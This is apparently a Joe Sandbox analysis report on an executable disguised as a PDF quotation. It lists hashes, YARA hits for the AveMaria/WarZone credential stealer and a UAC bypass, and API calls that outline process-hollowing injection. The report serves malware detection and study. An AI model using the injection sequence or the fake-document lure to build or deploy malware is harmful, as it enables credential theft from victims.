Path:	C:\Users\user\Desktop\order_of_quotationpdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\order_of_quotationpdf.exe
Imagebase:	0x400000
File size:	5464064 bytes
MD5 hash:	3A222BA5C055F7E201AE3A121FE9DB9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: AveMaria_WarZone, Description: unknown, Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: order_of_quotationpdf.exePID: 6752, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	16.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	12.2%
Total number of Nodes:	189
Total number of Limit Nodes:	11

Executed Functions

Function 078F1928 Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL(?,?), ref: 078F1995

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 29ab50d14bb878df4bdb246ef93d7610537255a518f215373d2ddf2dfdfaa1db
Instruction ID: 8992a0e8f7c082610b0fe4724c1a8f947fa57fadfe0fc57ba656d4557e364b7e
Opcode Fuzzy Hash: 29ab50d14bb878df4bdb246ef93d7610537255a518f215373d2ddf2dfdfaa1db
Instruction Fuzzy Hash: B31149B1D002498FCB10DFAAC4447DEBFF5EF98324F60881AD555A7650CB78A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 078F1930 Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL(?,?), ref: 078F1995

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 431634e4973c7d2e2041e05597a76b54cb26bf0e8cc6a193f383a8a81dd26d8e
Instruction ID: cfea6c48f88c988ff07ea10f35a2fe878220401ac92c7660580be9cb2138693b
Opcode Fuzzy Hash: 431634e4973c7d2e2041e05597a76b54cb26bf0e8cc6a193f383a8a81dd26d8e
Instruction Fuzzy Hash: 6B1149B1D002098BCB10DFAAC4447DEBFF9EB58324F10841AD555A7240CB78A944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 078CEA8C Relevance: 1.0, Instructions: 1012COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d4945066ba2bcfbe5d410fe93f8137f364d4478f2d4d7dacf77c84274a007de
Instruction ID: e56d0204ccdcfc65665744462f5ef86c4297c04e2d9b1600b995fefee274c0ab
Opcode Fuzzy Hash: 5d4945066ba2bcfbe5d410fe93f8137f364d4478f2d4d7dacf77c84274a007de
Instruction Fuzzy Hash: 32827870B006099FDB14EF78C894A6E7BE2FF99714B1484A9E546CB3A5DE34EC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 078C2090 Relevance: .7, Instructions: 676COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deec46f674026820f98c266fd54e804c1954f2d7f21334a2e54f3861023f392f
Instruction ID: b6c03897c10384398b39ac28af2dfb0e4f3a9dda6eafe348a0656bc6f188b9f8
Opcode Fuzzy Hash: deec46f674026820f98c266fd54e804c1954f2d7f21334a2e54f3861023f392f
Instruction Fuzzy Hash: 8642BE70A1021ACFDB14DF78C8546ADBBB6FF99304F1181AAE445EB391EB34E985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 078F1F08 Relevance: .6, Instructions: 597COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e4216d5a4d2542c151b2adeea4c0e28cceb5e27739576cf4c78ce2f8f0c543
Instruction ID: 6a8629a43d39b240e9b544d3aeb348fed6ebc7105b60b2d7d48d71219bae73a9
Opcode Fuzzy Hash: 36e4216d5a4d2542c151b2adeea4c0e28cceb5e27739576cf4c78ce2f8f0c543
Instruction Fuzzy Hash: 58228071A0021A9FDB14DFB9C850BAEBAE2FF84214F1481A9D50AEB391EE34DD45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01AF1450 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.401074873.0000000001AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1af0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1fa1f85886c0b4e4898f4be562bb68f1a7ed47aa7bee32950851d66e1dc8541
Instruction ID: d4423920d1fc756016c0507f4d2d206667f685568739fbfa139d5ddefb0cae71
Opcode Fuzzy Hash: a1fa1f85886c0b4e4898f4be562bb68f1a7ed47aa7bee32950851d66e1dc8541
Instruction Fuzzy Hash: 43B17CB4E04619CFDB24CFA9D880AADBBF2BF88301F14C56EE116AB245D7349985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01AF157E Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.401074873.0000000001AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1af0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c5919ecd9bf1f889dee28174bebdc395dfe39423d07f683594cdca0ebc91198
Instruction ID: fedabae202171a4ea3f3773b39a3db03797ee2653bebe693c5ac9dc60a4a249f
Opcode Fuzzy Hash: 2c5919ecd9bf1f889dee28174bebdc395dfe39423d07f683594cdca0ebc91198
Instruction Fuzzy Hash: CC717C39E01125CFDB14DBB9D8805AEBBB3BFC8315B14D569E406AB259EB346D028F81

Uniqueness

Uniqueness Score: -1.00%

Function 078F2838 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDecodePointer.NTDLL ref: 078F289F
RtlDecodePointer.NTDLL ref: 078F28E4
RtlEncodePointer.NTDLL(00000000), ref: 078F294F
RtlDecodePointer.NTDLL(-000000FC), ref: 078F2999
RtlEncodePointer.NTDLL(00000000), ref: 078F29D9
RtlDecodePointer.NTDLL ref: 078F2A1F
RtlDecodePointer.NTDLL ref: 078F2A63

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: Pointer$Decode$Encode
String ID:
API String ID: 1638560559-0
Opcode ID: fd37fe2d9d8b7aa80ba9ff2520476c346700e68c78e2c6dd62eb39d483268a05
Instruction ID: 855262a41a462180b2981641678578daa141971156e9eee23f0108fdd38728bb
Opcode Fuzzy Hash: fd37fe2d9d8b7aa80ba9ff2520476c346700e68c78e2c6dd62eb39d483268a05
Instruction Fuzzy Hash: B18125B4D01268DFDB20DFA9E18878CBBF5BB18318F24844AE985B7390C7795884CF61

Uniqueness

Uniqueness Score: -1.00%

Function 078F2823 Relevance: 10.7, APIs: 7, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDecodePointer.NTDLL ref: 078F289F
RtlDecodePointer.NTDLL ref: 078F28E4
RtlEncodePointer.NTDLL(00000000), ref: 078F294F
RtlDecodePointer.NTDLL(-000000FC), ref: 078F2999
RtlEncodePointer.NTDLL(00000000), ref: 078F29D9
RtlDecodePointer.NTDLL ref: 078F2A1F
RtlDecodePointer.NTDLL ref: 078F2A63

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: Pointer$Decode$Encode
String ID:
API String ID: 1638560559-0
Opcode ID: a3671c3a767bca4c3ca4872783cdae3a3c129aeb15f87bc7304516d2bf6966c1
Instruction ID: d64ff367cd5551a98dc4cb266e8bdf56c854f19dd20974ed1d924dd8cc40b57f
Opcode Fuzzy Hash: a3671c3a767bca4c3ca4872783cdae3a3c129aeb15f87bc7304516d2bf6966c1
Instruction Fuzzy Hash: DD7129B4D01258DFDB61DFA9D58878CBFF5BB28314F24844AE984A7391C7794884CF61

Uniqueness

Uniqueness Score: -1.00%

Function 078C7BF0 Relevance: 1.8, Strings: 1, Instructions: 506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p<k^, xrefs: 078C7CDD

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID: p<k^
API String ID: 0-1174027196
Opcode ID: d1481198c36e1520347915b014bb7404a827be7b1d33eae8f13ce1ee600a336f
Instruction ID: ff9076ec31a6ec8182c29d0e5b9c0d0d8fd3c026d242eceb84d72af6325475ca
Opcode Fuzzy Hash: d1481198c36e1520347915b014bb7404a827be7b1d33eae8f13ce1ee600a336f
Instruction Fuzzy Hash: 792228B4A0021ADFDB24DF64D954AAE7BB2FF88314F208158E906AB365DB35EC51CF50

Uniqueness

Uniqueness Score: -1.00%

Function 078F19DC Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078F1C1E

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 493d60d7498ab1acd9be3925798800daece70ac309269decf67defff780009e5
Instruction ID: b4045e98deb95795817116e538e9a0976973f64d39797897a33ac92a44095819
Opcode Fuzzy Hash: 493d60d7498ab1acd9be3925798800daece70ac309269decf67defff780009e5
Instruction Fuzzy Hash: 77A15AB1D0021ECFDB10DFA9C8857EEBBB2BB58314F1481A9E919E7240DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 078F19E8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078F1C1E

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 501a7cb235b8572f0aba465f935ade7d09c6465c46205f090d905a26d553bfb0
Instruction ID: d77f7cb4eca74d28cf7df06461c0e32676b6d5b2ecf036da2a55a6eb5f4772c8
Opcode Fuzzy Hash: 501a7cb235b8572f0aba465f935ade7d09c6465c46205f090d905a26d553bfb0
Instruction Fuzzy Hash: E7916AB1D0021ECFDB10CFA9C8857EEBBB2BB58314F1481A9E918E7240DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 078F0740 Relevance: 1.6, APIs: 1, Instructions: 93
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileW.KERNEL32(?,00000000,?), ref: 078F07E1

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: a8b5f2ed288458f90bdd7c7621b6394fd8a696c6dce826ce66b052db9dafb551
Instruction ID: cecdde9efb9ac0358c31fe8ca61a7327cf45117c11bf8820fd4cdd2c6ea0cfc9
Opcode Fuzzy Hash: a8b5f2ed288458f90bdd7c7621b6394fd8a696c6dce826ce66b052db9dafb551
Instruction Fuzzy Hash: 89316DB5D012199FCB10CFA9D884BEEBBF4EF58310F14806AE908EB251D7399940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 078F1839 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 078F18D0

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7d5ef2837c6dab653f5fe0200e372a59d0ebbd8598ebbd685d913abe0629efd9
Instruction ID: 26ac9a3f6cf3924a8b8d56e8bff3b34c5deb273e09474aeeced512aba05e5a96
Opcode Fuzzy Hash: 7d5ef2837c6dab653f5fe0200e372a59d0ebbd8598ebbd685d913abe0629efd9
Instruction Fuzzy Hash: 26214BB1D003599FCB10CFA9C8847EEBBF5FF48324F14852AE958A7240C7789944DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 078F0748 Relevance: 1.6, APIs: 1, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileW.KERNEL32(?,00000000,?), ref: 078F07E1

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 1dc2602da6cc268a1cab77fe99538e36e7490dd594c74b0841c76248b2e848bf
Instruction ID: 0e0ba1f0b611058699526eaf30a00bf64fe98bd13ff8746da4a62465166a36e9
Opcode Fuzzy Hash: 1dc2602da6cc268a1cab77fe99538e36e7490dd594c74b0841c76248b2e848bf
Instruction Fuzzy Hash: A42119B5D012199FCB50CF9AD5847EEBBF4EF58320F14816AE908E7245D7789944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 078F1E20 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 078F1EA8

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ac9b2522ffdace766024225c73219a89709dbc919bee2120fbacb6aa39cf9a9b
Instruction ID: 42b948dd8f56f95d5f68c0b604bfba59adce690db103e5359b10370af3ef0b21
Opcode Fuzzy Hash: ac9b2522ffdace766024225c73219a89709dbc919bee2120fbacb6aa39cf9a9b
Instruction Fuzzy Hash: 76212AB1D003599FCB10DFAAC884ADEBBB5FF48320F50842AE558A7240C7789541CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 078F1840 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 078F18D0

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e317540f46cd88b4e1c350fd6dbe945b7bdaf8a9d1bf1f9303fac7da8857c998
Instruction ID: 61b93a1478393ba9d1077d13f8c66206953b7ee1af81ca6880bd736e0c2fbb7c
Opcode Fuzzy Hash: e317540f46cd88b4e1c350fd6dbe945b7bdaf8a9d1bf1f9303fac7da8857c998
Instruction Fuzzy Hash: 2B2126B1D003599FCB10DFAAC9847EEBBF5FF48314F50842AE958A7240C778A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 078F16A1 Relevance: 1.6, APIs: 1, Instructions: 67
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNEL32(?,00000000), ref: 078F1726

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 8fc3ad2cfae0d38e293e9dad0cfeaf22ae533dcbe8178075a4054f7e7bc006e1
Instruction ID: 8cc9a963beb3aeaedb6f2e436cf3521e2d9d32a6688b07e440261e52968eeab7
Opcode Fuzzy Hash: 8fc3ad2cfae0d38e293e9dad0cfeaf22ae533dcbe8178075a4054f7e7bc006e1
Instruction Fuzzy Hash: E5213CB1D002199FCB10DFAAC4847EEBBF8EF58324F54842AD559A7240D778A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 078F16A8 Relevance: 1.6, APIs: 1, Instructions: 63
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNEL32(?,00000000), ref: 078F1726

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: fb3e1626684e865a30e0e28e4d8ef9fd39e8d928b3a55d95bb91f724404ca485
Instruction ID: 312745e1d68e4dc020443b4cbd823c6ac4c5bd4b0792794f0ae7d41cae000f3a
Opcode Fuzzy Hash: fb3e1626684e865a30e0e28e4d8ef9fd39e8d928b3a55d95bb91f724404ca485
Instruction Fuzzy Hash: 372137B1D002099FCB10DFAAC4847EEBBF4EF58324F54842AD559A7240CB78A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 078F1E28 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 078F1EA8

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 224ae828b447f065e6725ef5b6632e746d29bbb511cb074fcf65cf0b32b32e0e
Instruction ID: 5a3c5c79a2c9a248027e0045d131cd5c47fc8758ab6787054454d4473767cac8
Opcode Fuzzy Hash: 224ae828b447f065e6725ef5b6632e746d29bbb511cb074fcf65cf0b32b32e0e
Instruction Fuzzy Hash: 812128B1D003599FCB10DFAAC8847EEBBF5FF48320F50842AE558A7240C7789945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01AFDD4A Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEncodePointer.NTDLL(00000000), ref: 01AFDDD2

Memory Dump Source

Source File: 00000000.00000002.401074873.0000000001AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1af0000_order_of_quotationpdf.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 7c81e60dbf726cbd8ff1a6f8711b51d5095884ee3276c5531b5df91b649d8cfa
Instruction ID: a572605058e669e656e14d8d9b0c5629e00a5cfbaaa49c40e6586441f2b02274
Opcode Fuzzy Hash: 7c81e60dbf726cbd8ff1a6f8711b51d5095884ee3276c5531b5df91b649d8cfa
Instruction Fuzzy Hash: F621ACB19013598FDB52DFE9C94879ABFF8FB49314F10806EE545A7241C738A508CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AFDFF9 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEncodePointer.NTDLL(00000000), ref: 01AFE07D

Memory Dump Source

Source File: 00000000.00000002.401074873.0000000001AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1af0000_order_of_quotationpdf.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 4285db74355a0f1219aa98bb20b8dff299bf201d69ce9f444fc09d33d11c47c4
Instruction ID: 1275a2539feff6106944acfa4e4aedb971b84982360250097734d2c51a4d377b
Opcode Fuzzy Hash: 4285db74355a0f1219aa98bb20b8dff299bf201d69ce9f444fc09d33d11c47c4
Instruction Fuzzy Hash: 9021ACB18013A98FCB61CFA9D94879ABFF8EB18324F18445EE585E7241D3799604CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 078F1778 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 078F17EE

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 48d6d1c837abbdedf7df602408fb603b89963cbf0508e2c54d845807535add6a
Instruction ID: 8eb52690332e7d919ebbd53e9af2ee985bc98c3c7bf6b4eca96e4c659fe1b2cb
Opcode Fuzzy Hash: 48d6d1c837abbdedf7df602408fb603b89963cbf0508e2c54d845807535add6a
Instruction Fuzzy Hash: D12167719002499BCB10DFAAC844BDFBFF9EF48324F24841AE555A7250D779A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01AFDD58 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 01AFDDD2

Memory Dump Source

Source File: 00000000.00000002.401074873.0000000001AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1af0000_order_of_quotationpdf.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 689299cbb43c601006838dc93ee0eb22e3cae553f8e48939713ad7a5c978781e
Instruction ID: 599bfcfde23767641dabc7699dd7aa80f775efaacc87c5e5ec9aa99eee8c551d
Opcode Fuzzy Hash: 689299cbb43c601006838dc93ee0eb22e3cae553f8e48939713ad7a5c978781e
Instruction Fuzzy Hash: 0D119AB09003198FDF51DFE9C54879ABBF8EB48364F10802AE546A7741CB38A448CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 078F1780 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 078F17EE

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 84e31cb36e727491d7db34953360834718e3c1bfb3d3e832e52be08fdf154b41
Instruction ID: f85ef199c22540896f6dc50cb876c10dda8bb864ab26dfa15b1b86b6aeb31a9d
Opcode Fuzzy Hash: 84e31cb36e727491d7db34953360834718e3c1bfb3d3e832e52be08fdf154b41
Instruction Fuzzy Hash: B51126B19002499BCB10DFAAC8447DFBBF9EF58324F14841AE519A7250C779A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 078F15F1 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 078F165A

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 802add7ef8781cba319e46d259125443297846f048f03a33f5725853057de325
Instruction ID: 33b5800a99402ec9301573eef7d9547eb6c6cc902f421783548198be3d18ae9d
Opcode Fuzzy Hash: 802add7ef8781cba319e46d259125443297846f048f03a33f5725853057de325
Instruction Fuzzy Hash: 3C1149B1D002498BCB10DFAAC8447DEFBF9AF58324F14845AD559B7640C7786944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 078F15F8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 078F165A

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2964c3523b7783e95ae9477ca72922a9db8ff262b0e8f7af25b64666af788a27
